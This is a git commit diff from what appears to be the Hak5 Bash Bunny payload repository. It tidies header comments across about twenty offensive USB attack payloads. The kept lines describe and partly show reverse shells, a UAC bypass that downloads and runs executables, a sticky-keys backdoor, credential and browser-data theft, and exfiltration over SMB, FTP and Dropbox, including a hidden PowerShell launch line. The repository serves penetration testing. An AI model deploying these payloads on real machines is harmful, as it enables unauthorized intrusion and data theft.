Merge branch 'cleanup' of github.com:hak5/bashbunny-payloads into cleanup

cleanup
Foxtrot 2019-07-05 20:39:59 +01:00
commit f582f57a34
21 changed files with 219 additions and 220 deletions

View File

@ -4,17 +4,15 @@
# Author: RalphyZ # Author: RalphyZ
# Version: 1.1a # Version: 1.1a
# Target: Windows 7+ # Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file # Dependencies: Included a.vbs script
# #
# Description: Executes a VBScript, concealed in a hidden PowerShell window # Description: Executes a VBScript, concealed in a hidden PowerShell window
# #
# Colors: # LEDS:
# | Status | Color | Description | # Magenta: Setting attack mode, getting the switch position
# | ---------- | ------------------------------| ------------------------------------------------ | # Red Blink: Could not find the a.vbs script
# | SETUP | Magenta solid | Setting attack mode, getting the switch position | # Yellow Single Blink: Running the VBScript
# | FAIL | Red slow blink | Could not find the a.vbs script | # Green Blink to Solid: Script is finished
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Magenta solid # Magenta solid
LED SETUP LED SETUP

View File

@ -1,12 +1,19 @@
#!/bin/bash #!/bin/bash
# #
# Title: RevShellBack # Title: RevShellBack
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
# Author: NodePoint # Author: NodePoint
# Version: 0.1.3 # Version: 0.1.3
# Category: Execution # Category: Execution
# Target: Windows # Target: Windows
# Attackmodes: Ethernet, HID # Attack Modes: RNDIS_ETHERNET, HID
# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
#
# LEDS:
# Magenta: Setup
# Yellow Single Blink: Open CMD
# Yellow Double Blink: Start Reverse Shell
# Cyan Blink: Attack
# Green: Finished
# Set attack mode # Set attack mode
LED SETUP LED SETUP

View File

@ -2,17 +2,17 @@
# Title: ShellExec # Title: ShellExec
# Author: audibleblink # Author: audibleblink
# Target: Mac/Linux # Target: Mac, Linux
# Version: 1.1 # Version: 1.1
# Attack Modes: ECM_ETHERNET, HID
# Description: Create a web server on the BashBunny and force the victim to download and execute a script.
# Perfect for when mass storage isn't an option.
# #
# Create a web server on the BashBunny and force # LEDS:
# the victim to download and execute a script. # White: Ready
# Perfect for when mass storage isn't an option. # Amber Blink: Waiting for server
# # Blue Blink: Attacking
# White | Ready # Green: Finished
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED SETUP LED SETUP
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E

View File

@ -1,15 +1,17 @@
#!/bin/bash #!/bin/bash
# #
# Title: StickyBunny # Title: StickyBunny
# Author: Squibs # Author: Squibs
# Version: 0.3 # Version: 0.3
# Plug2Pwn: 18s # Attack Modes: HID
# Target: Windows
# Runtime: 18s
# Description: Creates the sticky keys back door on a windows machine
# #
# Creates the sticky keys back door on a windows machine # LEDS:
# # Blue: Preparing Attack
# Blue...............Preparing Attack # Yellow: Attacking
# Yellow.............Attacking # Green: Finished
# Green..............GTFO
#Open Admin Powershell #Open Admin Powershell
ATTACKMODE HID ATTACKMODE HID

View File

@ -1,14 +1,24 @@
# Title: UACBypass # Title: UACBypass
# Author: Skiddie # Author: Skiddie
# Version: 1.1 # Version: 1.1
# Target: Windows # Target: Windows
# Attack Modes: HID, STORAGE
# #
# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass) # Description: Download and executes any binary executable with administrator privileges WITHOUT prompting
# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
# However from what I am aware version 7,8 and 8.1 are still effected.
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
#
# LEDS:
# Magenta: Starting
# Green: Finished
#Define your bunny storage stick name #Define your bunny storage stick name
DRIVER_LABEL='BashBunny' DRIVER_LABEL='BashBunny'
#RED means starting #Magenta means starting
LED SETUP LED SETUP
#Gets File locations #Gets File locations
@ -17,7 +27,6 @@ GET SWITCH_POSITION
#We are a keyboard #We are a keyboard
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
QUACK DELAY 500 QUACK DELAY 500
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')" RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
QUACK DELAY 1000 QUACK DELAY 1000

View File

@ -4,18 +4,17 @@
# Author: LowValueTarget # Author: LowValueTarget
# Version: 1.2 # Version: 1.2
# Category: Powershell # Category: Powershell
# Target: Windows XP SP3+ (Powershell) # Target: Windows XP SP3+
# Attackmodes: HID, RNDIS_ETHERNET # Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.3 # Firmware: >= 1.3
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server.
# Ensure p.txt (your powershell payload) exists in payload directory
# #
# Quick HID attack to retrieve and run powershell payload from BashBunny web server # LEDS:
# ensure p.txt (your powershell payload) exists in payload directory # Yellow Single Blink: Running Initial Powershell Commands
# # Yellow Double Blink: Delivering powershell payload
# | Attack Stage | Description | # Green: Finished
# | ------------------- | ---------------------------------------- | # Red Blink: Failure
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 2 | Delivering powershell payload |
#
ATTACKMODE RNDIS_ETHERNET HID ATTACKMODE RNDIS_ETHERNET HID
LED SETUP LED SETUP

View File

@ -4,26 +4,22 @@
# Author: LowValueTarget # Author: LowValueTarget
# Version: 2.0 # Version: 2.0
# Category: Powershell # Category: Powershell
# Target: Windows XP SP3+ (Powershell) # Target: Windows XP SP3+
# Attackmodes: HID, RNDIS_ETHERNET # Attack Modes: HID, RNDIS_ETHERNET
# Firmware: >= 1.2 # Firmware: >= 1.2
# Required Tools: impacket
# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer.
# Possibilities are limitless! Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
# #
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! # LEDS:
# Credentials captured by are stored as loot. # Magenta: Setup
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # Yellow Single Blink: Powershell
# # Yellow Double Blink: Delivering powershell payload
# Required tools: impacket # White: Clean up
======= # Green: Finished
# Credentials captured by are stored as loot.
# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures)
#
# Required tools: impacket
#
# | Attack Stage | Description |
# | ------------------- | ------------------------------|
# | Stage 1 | Powershell |
# | Stage 2 | Delivering powershell payload |
# #
ATTACKMODE RNDIS_ETHERNET HID ATTACKMODE RNDIS_ETHERNET HID
# SETUP # SETUP

View File

@ -1,16 +1,17 @@
# Title: BlackBackup
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
# Green .............Execute Credential Ripper Powershell
# Off................Finished
#
#!/bin/bash #!/bin/bash
# Title: BlackBackup
# Author: JWHeuver & JBaselier
# Version: 1.0
# Description: Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# LEDS:
# Purple: Loading
# Green: Execute Credential Ripper Powershell
# Off: Finished
#
# OPTIONS - More options available in the Powershell payload # OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no OBFUSCATECMD="N" # Y=yes or N=no

View File

@ -1,18 +1,21 @@
#Title: FileInfoExfiltrator #!/bin/bash
#Author: A_SarcasticGuy
#Version: 1.0 # Title: FileInfoExfiltrator
#Target: Windows # Author: A_SarcasticGuy
# Version: 1.0
# Attack Modes: HID, STORAGE
# Targets: Windows
# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided)
# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*")
# to then be outputted to a text file in the loot directory, in a subfolder with the name of the
# system and with a file name of the date and time of the scan.
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
# #
#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan. # LEDS
# Magenta: Script Started
# Yellow: Ducky Script Started
# Red: Failed to run Ducky Script, see log file
# #
# Options: Search Directory: Find in p.bat (default c:/)
# Search criteria: Find in p.bat (default "pass*")
#
# Purple LED..................Script Started
# Yellow LED..................Ducky Script Started
# Red LED.....................Failed to run Ducky Script, see log file
#
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
# #
LED SETUP LED SETUP
@ -23,29 +26,18 @@ ATTACKMODE HID STORAGE
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
#Call ducky script #Call ducky script
LED STAGE1 LED STAGE1
QUACK ${SWITCH_POSITION}/ducky_script.txt QUACK ${SWITCH_POSITION}/ducky_script.txt
QUACK DELAY 10000 QUACK DELAY 10000
LED FINISH LED FINISH
else else
LED FAIL LED FAIL
#Red LED if unable to load script #Red LED if unable to load script
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1 exit 1
fi fi

View File

@ -4,9 +4,9 @@
# Author: k1ul3ss # Author: k1ul3ss
# Props: audibleblink # Props: audibleblink
# Version: 1.0 # Version: 1.0
# Category: Exfiltration # Targets: macOS
# Target: macOS # Attack Modes: HID, Storage
# Attackmodes: HID, Storage # Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage.
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

View File

@ -3,10 +3,15 @@
# Title: Powershell Extractor # Title: Powershell Extractor
# Author: $irLurk$alot # Author: $irLurk$alot
# Version: 1.0 # Version: 1.0
# Target: Windows # Targets: Windows
# Attack Modes: HID, STORAGE
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn runs powershell script to copy move and extract data.
# #
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # LEDS:
# which in turn runs powershell script to copy move and extract data. # Magenta: Setting Up
# Yellow Blink: Executing Powershell
# Green: Finished
LED SETUP LED SETUP

View File

@ -2,13 +2,14 @@
# #
# Title: sMacAndGrab # Title: sMacAndGrab
# Author: audibleblink # Author: audibleblink
# Target: macOS # Targets: macOS
# Version: 1.2 # Version: 1.2
# Attack Modes: STORAGE, HID
# Description: Backup a list of files from macOS
# #
# Backup a list of files from macOS # LEDS:
# # Yellow Blink: Attacking
# Yellow (blinking)...Attacking # Green: Finished
# Green...............Finished
LED ATTACK LED ATTACK
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

View File

@ -1,16 +1,18 @@
#!/bin/bash #!/bin/bash
# #
# Title: ExecutableInstaller # Title: SmartFileExtract
# Author: IMcPwn (original) # Author: IMcPwn
# Additions: SaintCrossbow (only for the parts to run SFE) # Props: SaintCrossbow
# Version: 1.0 # Version: 1.0
# Target: Windows 7+ # Targets: Windows
# # Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs
# which in turn executes e.cmd invisibly using i.vbs # which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it # using the --startup parameter. Change these settings inside of e.cmd.
# using the --startup parameter. Change these settings inside of e.cmd.
# #
# LEDS:
# Red: Attacking
# Green: Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION # Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh source bunny_helpers.sh

View File

@ -1,12 +1,18 @@
# Title: TwoStageMac # Title: TwoStageMac
# Description: A simple two stage payload for OSX. Sample second stage # Description: A simple two stage payload for OSX. Sample second stage
# does some device profiling. # does some device profiling.
#
# Author: Draxiom # Author: Draxiom
# Props: jdetmold # Props: jdetmold
# Version: 1.0 # Version: 1.0
# Category: Exfiltration # Category: Exfiltration
# Target: OSX # Target: OSX
# Attack Modes: HID, STORAGE # Attack Modes: HID, STORAGE
# LEDS:
# Magenta - Setup
# Yellow Blink - Attacking
# White - Clean up
# Green - Finished
LED SETUP LED SETUP
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE

View File

@ -2,16 +2,17 @@
# #
# Title: BrowserData # Title: BrowserData
# Author: zachstanford # Author: zachstanford
# Version: 0.1 (Tested on Windows 10) # Version: 0.1
# Targets: Windows
# Attack Modes: HID, STORAGE
# Description: Dumps browser info like history and bookmarks from powershell script
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
# Credits to this Empire's powershell script:
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
# #
# Dumps browser info like history and bookmarks from powershell script # LEDS:
# then saves them in /root/udisk/loot/BrowserData/%ComputerName% # Blue: Running Script
# Credits to this Empire's powershell script: # Magenta: Finished
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
#script
# Blue...............Running Script
# Purple.............Finished
# Not sure if this is the right variable. Feel free to change it. # Not sure if this is the right variable. Feel free to change it.
@ -23,7 +24,6 @@ LED R SLOW
LOOTDIR=/root/udisk/loot/BrowserData LOOTDIR=/root/udisk/loot/BrowserData
mkdir -p $LOOTDIR mkdir -p $LOOTDIR
LED B SLOW LED B SLOW
# wait 6 seconds for the storage to popup # wait 6 seconds for the storage to popup

View File

@ -1,9 +1,14 @@
# Dropbox Exfiltrator # Title: Dropbox Exfiltrator
# Author: Hak5Darren # Author: Hak5Darren
# Props: jimcola99 Buchanan # Props: jimcola99, Buchanan
# Demo: Hak5 episode 2505 # Demo: Hak5 Episode 2505
# Target: Windows Vista+ # Targets: Windows
# Category: Exfiltration # Description: Exfiltrate via DropBox
#
# LEDS:
# Magenta: Setup
# Yellow Blink: Getting Script
# Green: Finish
LED SETUP LED SETUP
ATTACKMODE HID ATTACKMODE HID

View File

@ -1,19 +1,17 @@
#!/bin/bash #!/bin/bash
# #
# Title: FTP Exfiltrator # Title: FTP Exfiltrator
# Author: Nutt # Author: Nutt
# Version: 1.0 # Version: 1.0
# Target: Windows # Targets: Windows
# Description: Exfiltrates files from the users Documents folder FTP's all files/folders to a specified
# FTP site named by the victim hostname. Powershell FTP script will stay running after
# BashBunny is unpluggedonce light turns green unplug and check FTP site.
# #
#Exfiltrates files from the users Documents folder # LEDS:
#FTP's all files/folders to a specified FTP site named by the victim hostname. # Purple: Setup
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. # Red: Failed - Need to work on
# Green: Finished
#Executes 1.ps1
#Purple.........Setup
#Red............Failed - Need to work on
#Green..........Finished
LED SETUP LED SETUP
GET SWITCH_POSITION GET SWITCH_POSITION

View File

@ -1,31 +1,22 @@
#!/bin/bash #!/bin/bash
# #
# Title: Optical Exfiltration # Title: Optical Exfiltration
# Author: bg-wa # Author: bg-wa
# Version: 1.0 # Version: 1.0
# Category: HID # Targets: macOS, Linux
# Target: *NIX # Attack Modes: HID
# Attackmodes: HID # Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor # Description: Quick HID only attack to write an HTML/JS file to target machine
# and open a browser, to exfiltrate data Using QR Codes and a video recording device.
# Optional html params:
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
# playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering.
# Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
# #
# Quick HID only attack to write an HTML/JS file to target machine # LEDS:
# and open a browser, to exfiltrate data Using QR Codes and a video # Magenta: Open vi
# recording device. # Yellow Blink: Writing HTML
# # Green: Browser Ready/Processing
# Optional html params:
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
#
# playback: Passing the string "finish" to this param will auto-play the results,
# when QR codes finish rendering.
#
# Example:
# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing HTML |
# | FINISH | Browser Ready/Processing |
# #
ATTACKMODE HID ATTACKMODE HID

View File

@ -1,4 +1,16 @@
# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs #!/bin/bash
#
# Title: simple-usb-extractor
# Version: 1.0
# Author: danthegoodman1
# Targets: Windows
# Attack Modes: HID, STORAGE
# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
#
# LEDS:
# Yellow Blink - Attacking
# Green - Finished
GET SWITCH_POSITION GET SWITCH_POSITION
LED ATTACK LED ATTACK
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE

View File

@ -4,47 +4,20 @@
# Author: Hak5Darren # Author: Hak5Darren
# Props: ImNatho, mike111b, madbuda # Props: ImNatho, mike111b, madbuda
# Version: 1.1 # Version: 1.1
# Category: Exfiltration # Target: Windows XP
# Target: Windows XP SP3+ (Powershell) # Attack Modes: HID, RNDIS_ETHERNET
# Attackmodes: HID, Ethernet # Requires: Impacket Tool
# Description: Exfiltrates select files from users's documents folder via SMB.
# Liberated documents will reside in Bash Bunny loot directory under
# loot/smb_exfiltrator/HOSTNAME/DATE_TIME. Exfiltration options configured from included s.ps1 script.
# #
# CHANGELOG # LEDS:
# ========= # Red: Failed to find dependencies
# Rewrite of the original SMB Exfiltrator payload with: # Yellow Single Blink: HID Stage
# - Faster copying, using robocopy multithreaded mode # Yellow Double Blink: Ethernet Stage
# - Faster finish, using a EXFILTRATION_COMPLETE file # Cyan: Receiving Files
# - Offload logic to target PC for accurate date/time # White: Moving Liberated Files
# - Clears tracks by default without second run dialog # Green: Finished
# - Test-Connection handling by ICMP (no lame sleeps)
# - Hidden powershell window by default
#
# REQUIREMENTS
# ============
# Needs impacket to be copied to /tools/impacket and installed
# Option A:
# 1. Download impacket from https://github.com/CoreSecurity/impacket
# 2. Copy impacket folder to /tools on the Bash Bunny flash drive
# 3. Boot Bash Bunny into arming mode and connect to console via serial
# 4. Issue "python /tools/impacket/setup.py install"
# Option B:
# 1. Download impacket deb package
# 2. Copy impacket.deb to /tools on the Bash Bunny flash drive
# 3. Boot Bash Bunny into arming mode. Impacket will install automatically.
#
# LED STATUS
# ==========
# FAIL........Failed to find dependencies
# STAGE1......HID Stage
# STAGE2......Ethernet Stage
# SPECIAL.....Receiving Files
# CLEANUP.....Moving Liberated Files
# FINISH......Finished
#
# OPTIONS
# =======
# Exfiltration options configured from included s.ps1 script
######## INITIALIZATION ######## ######## INITIALIZATION ########
REQUIRETOOL impacket REQUIRETOOL impacket

View File

@ -3,14 +3,16 @@
# Title: USB Exfiltrator # Title: USB Exfiltrator
# Author: Hak5Darren # Author: Hak5Darren
# Version: 1.1 # Version: 1.1
# Target: Windows XP SP3+ # Target: Windows XP
# Props: Diggster, IMcPwn # Props: Diggster, IMcPwn
# Category: Exfiltration # Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# # which in turn executes e.cmd invisibly using i.vbs
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn copies documents to the loot folder on the Bash Bunny.
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny.
# #
# LEDS:
# Yellow Blink: Attacking
# Green: Finished
GET SWITCH_POSITION GET SWITCH_POSITION
LED ATTACK LED ATTACK
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE